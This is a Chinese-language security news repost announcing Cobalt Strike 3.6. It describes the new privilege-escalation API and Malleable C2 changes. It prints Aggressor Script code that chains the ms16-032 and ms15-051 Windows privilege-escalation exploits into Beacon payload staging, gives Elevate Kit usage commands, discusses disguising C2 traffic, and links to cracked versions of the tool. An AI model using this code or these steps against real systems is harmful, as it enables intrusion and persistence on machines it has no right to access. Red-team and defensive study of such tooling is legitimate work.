未加星标

提权利器Cobalt Strike发布3.6版本

字体大小 | |
[系统(windows) 所属分类 系统(windows) | 发布者 店小二03 | 时间 2017 | 作者 红领巾 ] 0人收藏点击收藏
简介

Cobalt Strike 3.6版本已经正式发布,此版本新增了一个用于调用 Beacon 的第三方提权漏洞利用程序的 API ,并扩展Malleable C2以支持不使用HTTP POST的HTTP C&C。同时该版本还对之前版本中存在的问题进行了修复和改进。目前网上能找到3.5版本的破解版本,相关破解以及工具使用技巧在FB上资源还是挺多的。

CobaltStrike最新版完美破解方法

如何制作Cobalt Strike v2.5破解版

在Kali 2.0下安装破解最新版Cobalt Strike

关于分析Cobalt Strike的beacon.dll的一些TIPS

提权API

此版本新增了一个 API将提权利用程序集成到 Beacon的elevate命令。

下面以FuzzySec发现的ms16-032漏洞为例子,将 变型的PowerShell Empire 集成到Beacon中:

sub ms16_032_exploit {
local('$script $oneliner');
# acknowledge this command
btask($1, "Tasked Beacon to run " . listener_describe($2) . " via ms16-032");
# generate a PowerShell script to run our Beacon listener
$script = artifact($2, "powershell");
# host this script within this Beacon
$oneliner = beacon_host_script($1, $script);
# task Beacon to run this exploit with our one-liner that runs Beacon
bpowershell_import!($1, script_resource("modules/Invoke-MS16032.ps1"));
bpowerpick!($1, "Invoke-MS16032 -Command \" $+ $oneliner $+ \"");
# give it another 10s to work.
bpause($1, 10000);
# handle staging
bstage($1, $null, $2);
}
beacon_exploit_register("ms16-032", "Secondary Logon Handle Privilege Escalation (CVE-2016-099)", &ms16_032_exploit);

接下来,我们试试别的。 Metasploit框架 应用了许多依照反射DLL( Reflective DLLs )注入原理提权的exploit。

Metasploit提权利用攻击的流程

首先生成一个patsy进程,其次将exploit注射到patsy进程,之后将stager shellcode payload注射到patsy进程,最后运行exploit DLL时通过一个指针指向已经完成注射的shellcode。

可能你会有疑问,是否还能在Beacon中使用 这些DLL ?得益于 Aggressor Script 中的bdllspawn函数我们依旧可以在Beacon中使用这些DLL。这个函数调用一个作用于Beacon post-exploitatio的 反射DLL ,它可以向DLL传递一个任意参数,并且可以监控标准输出。

以下脚本为使用 ms15_051_client_copy_image 的Beacon payload:

sub ms15_051_exploit {
# acknowledge this command
btask($1, "Task Beacon to run " . listener_describe($2) . " via ms15-051");
# tune our parameters based on the target arch
if (-is64 $1) {
$arch = "x64";
$dll = "modules/cve-2015-1701.x64.dll";
}
else {
$arch = "x86";
$dll = "modules/cve-2015-1701.x86.dll";
}
# generate our shellcode
$stager = shellcode($2, false, $arch);
# make sure we have shellcode for this listener (some stagers are x86 only)
if ($stager is $null) {
berror($1, "No $arch stager for listener ' $+ $2 $+ '");
return;
}
# spawn a Beacon post-ex job with the exploit DLL
bdllspawn!($1, script_resource($dll), $stager, "ms15-051", 5000);
# stage our payload (if this is a bind payload)
bstage($1, $null, $2, $arch);
}
beacon_exploit_register("ms15-051", "windows ClientCopyImage Win32k Exploit (CVE 2015-1701)", &ms15_051_exploit);

这些函数使得你的团队能更轻松的集成Cobalt Strike自定义功能,以及在Beacon中快速适配新的漏洞。

提权套件

如果你想了解更多提权相关的范例,可以查看 Elevate Kit 。此外还可以查阅 Aggressor Script ,该文演示了如何在Cobalt Strike的Beacon payload中使用PowerShell以及反射DLL exploit。

Elevate Kit使用方法:下载 ElevateKit 文件并将其提取到Cobalt Strike,进入Cobalt Strike -> Scripts,单击Load,然后选择elevate.cna

在Beacon中:键入elevate可查看当前加载的exploit列表。键入elevate [exploit name] [listener]针对当前Beacon会话实施利用。 Malleable C2

以下截图为Beacon与 webbug_getonly profile 的通信数据。

你可以猜到哪边是Beacon对Cobalt Strike发起的下载任务请求? 哪边是Beacon对Cobalt Strike做出的响应?


提权利器Cobalt Strike发布3.6版本

本版本通过使用Malleable C2很大程度上增强了Beacon的HTTP通信的灵活性。你现在可以为Beacon的http-get和http-post处理方式设置HTTP动词。同时还可以将Beacon的响应推送到URI、数据头或参数中。而且Beacon将其响应自动分块(并使用多个请求)以适应HTTP GET-only通道的约束。

如果你喜欢对配置文件的技巧以及分析发起挑战,我想这会带给你更多的乐趣。此外这些变化还使得“模拟”不同恶意软件的HTTP通信数据变得更精确。

点击 发行说明 查看Cobalt Strike 3.6中的新特性的完整列表。授权用户可使用 更新程序 获取更新,同时提供21天试用的 Cobalt Strike trial版本 也发布了。

注:由于美国出口控制要求,你得全局科学访问该使用版本下载页面。另外试用版本没有对Beacon任务以及响应加密,仅建议在实验环境下使用,切勿在生产环境下使用!授权用户则无此限制。

*参考来源: Cobaltstrike ,FB小编鸢尾编译,转载请注明来自CodeSec(CodeSec.Net)

本文系统(windows)相关术语:三级网络技术 计算机三级网络技术 网络技术基础 计算机网络技术

主题: PowerShellWindows数据TI出口
分页:12
转载请注明
本文标题:提权利器Cobalt Strike发布3.6版本
本站链接:http://www.codesec.net/view/520697.html
分享请点击:


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 系统(windows) | 评论(0) | 阅读(280)